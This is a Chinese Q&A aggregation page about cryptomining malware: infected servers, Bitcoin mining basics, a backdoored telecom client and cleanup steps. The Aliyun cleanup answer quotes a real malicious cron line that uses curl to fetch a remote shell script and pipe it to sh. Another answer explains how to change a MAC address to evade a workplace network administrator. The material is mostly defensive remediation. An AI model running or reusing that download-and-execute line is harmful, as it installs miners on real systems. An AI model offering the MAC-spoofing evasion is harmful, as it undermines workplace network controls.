网站会被挖矿吗

① 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

② 网络上的自动挖矿赚钱有是做什么的有什么坏处

估计你所看到的是指比特币。
这是一种虚拟货币，涨跌不定。
有些人业余开着电脑运行所谓的挖矿程序来“挖”比特币，挖到了就去卖钱。有些是公司化运作，投入大量人力物力挖矿。盈亏不好说。
现在比特币没以前容易得到了。

③ 网上挖矿是什么

挖矿是将一段时间内比特币系统中发生的交易进行确认，并记录在区块链上形成新区块的过程，挖矿的人叫做矿工，简单说来，挖矿就是记账的过程，矿工是记账员，区块链就是账本，怎样激励矿工来挖矿呢？比特币系统的记账权力是去中心化的，即每个矿工都有记账的权利，成功抢到记账权的矿工会获得系统新生的比特币奖励因此挖矿就是生产比特币的过程。中本聪最初设计比特币时规定每产生210000个区块，比特币奖励减半一次，直至比特币不能再被细分，因为比特币和黄金一样总量有限，所以比特币被称为数字黄金，比特币生产也俗称挖矿。
.比特币系统靠调节难度系数保证比特币不被太快挖完，每10分钟全网旷工共同计算一道难题竞争记账权及比特币奖励，如果全网算力不断增长比特币将很快被挖完，为了保证比特币稳定在大约10分钟挖出一个区块，中本聪设计矿工挖矿获得比特币的难度，每过2016个区块(约2周时间)动态调整一次，令调整后的难度使得每生成一个区块的预期时间为10分钟现在的难度系数约为480PH/S(注:2017年9月)大约是创世区块的680亿倍，也就是说，以现在的算力，全网矿工需要经过约3000万亿亿哈希运算才能找到一个符合条件的答案，生成新的区块。
.相对于点对点交易，挖矿等在交易平台购买是目前获得区块链资产最主流的方式，即场内交易，区块链资产的场内交易和股票类似，由平台帮你撮合，也不需要知道跟你成交的对手是谁，你的成交对手，有可能是一个人，也有可能是很多人，无论是买入还是卖出，交易平台会记录所有人的挂单价格，买卖双方通过实时买卖盘，可以获取最新成交价格，同时交易平台会将历史成交价格及成交量汇总成K线图，方便投资者用于分析行情走势，比如乌托市场就是全球比较主流的交易平台。

④ 免费的加速器会偷偷的挖矿吗

不用天真了，世界上根本就不存在免费的东西。加速器收费有他的商业逻辑，收费靠的是收取用户的费用来支撑高昂的服务器带宽成本。免费也有他的商业逻辑，在不影响体验的情况下，适当的加一些第三方广告维持成本顺带小赚一笔，还能进行推广。。很高兴能为你提供帮助

⑤ 挖矿会被电信公司发现

不确定，中国电信江苏分公司校园门户网站(pre.f-young.cn)提供下载的“天翼校园客户端”被植入后门病毒，该病毒可接受黑客远程指令，利用中毒电脑刷广告流量，同时也会释放“门罗币”挖矿者病毒进行挖矿。用户在安装“天翼校园客户端”之后，就会在安装目录中自动释放speedtest.dll文件，也就是病毒的本体，所有执行下载、释放其他病毒模块等操作都由这个文件进行。广告刷量模块被执行后，它会创建一个隐藏的IE窗口，然后开始读取云端指令，在后台模拟用户操作鼠标、键盘点击刷广告。为了让用户不察觉这一情况，还屏蔽了声卡播放广告页面中的声音。
另外的病毒挖矿模块，在分析之后发现所挖的是“门罗币”，这是一种类似于“比特币”的数字虚拟货币，每杖价格约500元。当病毒模块开始“挖矿”时，计算机CPU资源占用量明显飙升，导致电脑性能变差，发热量上升，同时电脑风扇也会高速运行，电脑噪音也会随之增加。最后还发现，一款签名为“中国电信股份有限公司”农历日历(Chinese Calendar)同样存在该后门病毒。一般来说，像电信这样大型企业公司的签名应该不会存在什么问题，这次被植入病毒确实让人觉得有些奇怪，但究竟是怎么被植入的，目前还没有结果。
比特币介绍：
一、比特币的发行和交易的完成是通过挖矿来实现的，它以一个确定的但不断减慢的速率被铸造出来。每一个新区块都伴随着一定数量从无到有的全新比特币。境外很多人以挖矿为生，但是在境内是不允许的，目前有关部门对此内容采取严打态势。在家里利用电脑挖矿，如果没有大量用电的情况下，一般不会被供电局调查；如果耗电比较严重，又或者是有偷电行为，就有可能被供电局调查。到时候就不仅仅是被罚款那么简单了，还有可能承担刑事责任。
二、工业互联网平台和智能设备成为网络威胁的重要目标。据国家工业信息安全发展研究中心监测，第二季度我国境内共有22个工业互联网平台提供服务，针对这些工业互联网平台的、来源于境外的网络攻击事件共有656起，涉及北京、重庆、湖南、内蒙古等地区；新增工业控制系统漏洞115个，涉及罗克韦尔、西门子、施耐德电气等品牌的71款产品；我国境内感染工业互联网智能设备恶意程序的受控IP地址共有52.7万余个，受控IP地址数量在1万个以上的僵尸网络共有13个。

⑥ 在单位这样偷偷上网会被发现吗

这样的方法还是会让网管发现的，因为你买的这块网卡也是有个固定的mac地址的，网管那里只是觉得这个mac是新出现的并非检测不到。
你可以尝试以下的方法修改软mac地址：
1、右击网上邻居属性---打开网卡所使用网卡的链接属性----点击配置----然后再点高级选项卡---然后在下面选择网络地址----在右边选择值，然后在方框里输入16进制的字符输满为止---一路确定退出。

这样就修改了mac地址，但重新启动的时候就会消失，必须得再次修改才行。

不过网管一旦发现你们总是用这样的方法的话，人家会把mac地址和ip地址进行绑定的，那时候你们就一点办法都没有了。

你不听的修改mac地址肯定是没问题，这也是黑客比用的方法，难道你还找个僵尸机器上网不行，僵尸攻击的方法是黑客们没有办法了才去操作和利用那些菜鸟的机器。

但修改mac地址的方法用多了让网管发现了会将能上网的mac地址和ip进行绑定的，如果是绑定了的话你就没有任何办法了。

意思就是，这种修改软mac的方法，只要电脑一重启，你修改的mac地址就又变回了网卡的物理mac地址。就是说，只要电脑重启一次就要改一次。

⑦ 免费的加速器会偷偷的挖矿吗,,

免费的加速器会偷偷的挖矿。

除了烧显卡的机器，一些ASIC（应用专用集成电路）专业挖矿机也在投入战场，ASIC是专门为哈希运算设计的，计算能力也相当强劲，而且由于它们的功耗远比显卡低，因此更容易形成规模，电费开销也更低，单张独显很难与这些挖矿机竞争，但与此同时，这种机器的花费也更大。

挖矿过程：

矿工们在挖矿过程中会得到两种类型的奖励：创建新区块的新币奖励，以及区块中所含交易的交易费。为了得到这些奖励，矿工们争相完成一种基于加密哈希算法的数学难题。

⑧ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

⑨ 最近听说进入不良网站，黑客会拿我们的手机挖矿啥的，自动弹出的不良网站我点进去一秒就退了，被挖矿吗

没有想的那么神奇。。现在的不良网站一般都是教人如何赌博。。如何打架什么的。通常会有赌博网站的连接在里面。。诱惑你去赌博的。。没有什么挖矿什么的。。退出去以后。重启下手机。。基本就正常了。。

⑩ 退出不良网站手机还在挖矿吗

噢，还有可能在后台运行中进行（最好先关了后台运行，再退出）